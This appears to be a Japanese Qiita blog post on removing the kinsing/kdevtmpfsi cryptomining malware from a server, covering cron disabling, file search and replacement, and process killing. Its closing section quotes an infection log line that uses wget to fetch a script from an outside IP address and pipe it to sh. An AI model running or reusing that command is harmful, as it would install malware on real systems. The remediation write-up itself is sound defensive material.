8
2

Delete article

Deleted articles cannot be recovered.

Draft of this article would be also deleted.

Are you sure you want to delete this article?

More than 3 years have passed since last update.

マルウェア kinsing(kdevtmpfsi) 削除方法

Posted at

はじめに

仮想通貨をマイニングするマルウェア kinsing(kdevtmpfsi)に感染していたため、削除するための手順を記録します。

CPU使用率99%!

CPU使用率99%.png

削除方法

cron無効化

1分置きに定期実行されているcronを削除・再作成して、使えないようにします。

rm /var/spool/cron/apache
mkdir /var/spool/cron/apache
chmod 755 /var/spool/cron/apache

マルウェアファイル検索

find / -name kdevtmpfsi
find / -name kinsing

いくつかのディレクトリから対象のファイルが見つかります。
私の場合は以下の5ディレクトリ

  • /tmp
  • /tmp/systemd-private-*
  • /var/tmp
  • /var/tmp/systemd-private-*
  • /dev/shm

マルウェアファイル無効化

ファイル検索で見つかったマルウェアファイル(kdevtmpfsiとkinsing)を削除・再作成して、使えないようにします。

rm ./kdevtmpfsi
touch ./kdevtmpfsi
chmod 644 ./kdevtmpfsi

rm ./kinsing
touch ./kinsing
chmod 644 ./kinsing

kdevtmpfsi○○というファイルがたくさん見つかった場合、全削除します。

rm -rf ./kdevtmpfsi*

プロセス削除

検索して出てきたプロセスをkillします。

ps -ef | grep kdevtmpfsi
kill 9999

おわりに

ちなみにcronのログには怖そうなログがたくさん出ていました。

vi /var/log/cron
日付 CROND[21134]: (apache) CMD (wget -q -O - http://195.3.146.118/lr.sh | sh > /dev/null 2>&1)
日付 crond[18693]: (apache) INFO (Job execution of per-minute job scheduled for 14:13 delayed into subsequent minute 14:15. Skipping job run.)

参考サイト

8
2
0

Register as a new user and use Qiita more conveniently

  1. You get articles that match your needs
  2. You can efficiently read back useful information
  3. You can use dark theme
What you can do with signing up
8
2

Delete article

Deleted articles cannot be recovered.

Draft of this article would be also deleted.

Are you sure you want to delete this article?